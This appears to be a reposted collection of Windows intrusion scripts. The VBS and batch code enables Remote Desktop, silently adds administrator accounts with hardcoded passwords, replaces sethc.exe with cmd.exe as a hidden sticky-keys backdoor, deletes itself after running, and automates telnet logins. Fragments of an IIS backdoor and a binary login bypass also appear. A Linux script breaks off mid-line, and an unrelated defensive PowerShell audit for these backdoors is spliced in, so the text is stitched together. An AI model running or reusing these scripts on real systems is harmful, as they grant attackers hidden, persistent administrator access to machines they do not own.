Enable 3389 on XP/2003, create an admin user without net, Shift backdoor, self-deleting script, privilege-escalation VBS (collected) 2010-12-07

Enable 3389 on XP/2003, create an admin user without net, Shift backdoor, self-deleting script (VBS)

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
 strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath

On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

Add user
--------------------------------
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
-------------------------------------------------
VBS add-user, minimal version

set w=createobject("wscript.shell"):w.run "net user hack echoeye /add",0:w.run "net localgroup administrators hack /add",0
-----------------------------------------------------
cmd.asp webshell upload
---------------------------------------------------
--------------------------------------------------------------------
Shift backdoor
---------------------------------------------
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门 By:Hack残少 QQ:297248524
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo 感谢您使用Shift后门
echo.
echo By:Hack残少 QQ:297248524
echo.
echo http://www.shenmicaobi.com/
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit
--------------------------------------------------------------
VBS code that adds a user without relying on CMD

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) 'get the ADSI interface and bind
Set oe=GetObject(os&"/Administrators,group") 'the Administrators group
Set od=ob.Create("user","test") 'create the user
od.SetPassword "1234" 'set the password
od.SetInfo 'save
Set of=GetObject(os&"/test,user") 'get the user
oe.add os&"/test"
------------------------------------------
A VBS script that adds local users by sending keystrokes

Dim WshShell
set WshShell = CreateObject("wscript.Shell")
WshShell.Run "cmd /k"
for i = 1 to 3
  WScript.Sleep 500
  WshShell.SendKeys "net user admin" & i & " abcd@123 /add"
  WshShell.SendKeys "{ENTER}"
next
WshShell.SendKeys "exit"
WshShell.SendKeys "{ENTER}"
---------------------------------------------
God's Gate: once it has run, any password logs in to the administrator account over 3389. Save as .exe
------------------------
MZ
------------------------
IIS backdoor
-------------------
help1="IIS后门设置器 黑猫专用版"
help2="请输入正确的虚拟目录名称和映射的路径,格式如下"
help3=" cscript.exe iis.vbs 虚拟目录的名称 映射的路径"
help4="例如: cscript.exe iis.vbs lh e:"
set Args = Wscript.Arguments
if args.count
-------------------
telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "open 192.168.1.200" >>telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "{ENTER}" >>telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "engineer{ENTER}" >>telnet_tmp.vbs
echo WScript.Sleep 300 >>telnet_tmp.vbs
echo sh.SendKeys "ls {ENTER}">>telnet_tmp.vbs
start telnet
cscript //nologo telnet_tmp.vbs
del telnet_tmp.vbs

Appendix: what the SendKeys command can send is shown in the following list:

BACKSPACE      {BACKSPACE}, {BS}, or {BKSP}
BREAK          {BREAK}
CAPS LOCK      {CAPSLOCK}
DEL or DELETE  {DELETE} or {DEL}
DOWN ARROW     {DOWN}
END            {END}
ENTER          {ENTER} or ~
ESC            {ESC}
HELP           {HELP}
HOME           {HOME}
INS or INSERT  {INSERT} or {INS}
LEFT ARROW     {LEFT}
NUM LOCK       {NUMLOCK}
PAGE DOWN      {PGDN}
PAGE UP        {PGUP}
PRINT SCREEN   {PRTSC}
RIGHT ARROW    {RIGHT}
SCROLL LOCK    {SCROLLLOCK}
TAB            {TAB}
UP ARROW       {UP}
F1 .. F16      {F1} .. {F16}
SHIFT          +
CTRL           ^
ALT            %

2. Linux platform

Make sure the expect executable exists on your system, save the following code to a file named autoTelnet and give it execute permission. See the expect command for details.

#!/usr/bin/expect --
set SERVER "192.168.1"
set USER "myusername"
set PASSWD "mypass"
if { argv } else { spawn telnet SERVER.200 }
expect "Password:"
send "
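As an added, defender-side example that is not part of the original post, the PowerShell audit below checks a Windows host for the three things the scripts above leave behind: a sethc.exe that was swapped for cmd.exe or explorer.exe (or hidden, or left with staging copies), the Terminal Server registry values they set, and the members of the local Administrators group read through the same WinNT provider the add-user VBS uses. It assumes an elevated session on the host being checked; the function names and ALERT/WARN/INFO labels are my own.

```powershell
# Added defensive audit, not from the original post. Assumes an elevated
# PowerShell session on the Windows host being checked.
function Get-Sha256Hex([string]$Path) {
    $fs = [System.IO.File]::OpenRead($Path)          # works on hidden files too
    try { [BitConverter]::ToString([Security.Cryptography.SHA256]::Create().ComputeHash($fs)) -replace '-', '' }
    finally { $fs.Dispose() }
}

function Invoke-StickyKeysAudit {
    $sys32 = Join-Path $env:SystemRoot 'system32'
    $findings = @()

    # 1. A sethc.exe copied over from cmd.exe/explorer.exe keeps that file's
    #    version resource and is byte-for-byte identical to it.
    $refs = @{}
    foreach ($r in (Join-Path $sys32 'cmd.exe'), (Join-Path $env:SystemRoot 'explorer.exe')) {
        if (Test-Path $r) { $refs[(Get-Sha256Hex $r)] = $r }
    }
    foreach ($p in (Join-Path $sys32 'sethc.exe'), (Join-Path $sys32 'dllcache\sethc.exe')) {
        if (-not (Test-Path $p)) { continue }
        $item = Get-Item $p -Force                    # -Force: the batch sets +h
        $orig = $item.VersionInfo.OriginalFilename
        if ($orig -notlike 'sethc.exe*') { $findings += "ALERT $p OriginalFilename='$orig'" }
        $h = Get-Sha256Hex $p
        if ($refs.ContainsKey($h)) { $findings += "ALERT $p is a copy of $($refs[$h])" }
        if (($item.Attributes -band [IO.FileAttributes]::Hidden) -ne 0) { $findings += "WARN $p is hidden" }
    }
    foreach ($n in 'acmd.exe', 'asethc.exe') {       # staging copies from the takeown/cacls VBS
        if (Test-Path (Join-Path $sys32 $n)) { $findings += "ALERT leftover $n in system32" }
    }

    # 2. Terminal Server values the scripts write
    $ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $deny = (Get-ItemProperty -Path $ts -ErrorAction SilentlyContinue).fDenyTSConnections
    if ($deny -eq 0) { $findings += 'WARN fDenyTSConnections=0 (Remote Desktop enabled)' }
    foreach ($k in "$ts\WinStations\RDP-Tcp", "$ts\Wds\rdpwd\Tds\tcp") {
        $port = (Get-ItemProperty -Path $k -ErrorAction SilentlyContinue).PortNumber
        if ($null -ne $port) { $findings += "INFO $k PortNumber=$port" }
    }

    # 3. Administrators membership via the WinNT ADSI provider, so accounts
    #    created the way the VBS does it show up here.
    $grp = [ADSI]'WinNT://./Administrators,group'
    $names = @($grp.psbase.Invoke('Members') |
        ForEach-Object { $_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null) })
    $findings += "INFO Administrators: $($names -join ', ')"
    return $findings
}

Invoke-StickyKeysAudit | Write-Output
```

A clean host reports no ALERT lines; compare the INFO lines against what the system is expected to have.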
Publisher: 全栈程序员栈长. When reposting, cite the source: https://javaforall.cn/193554.html Original link: https://javaforall.cn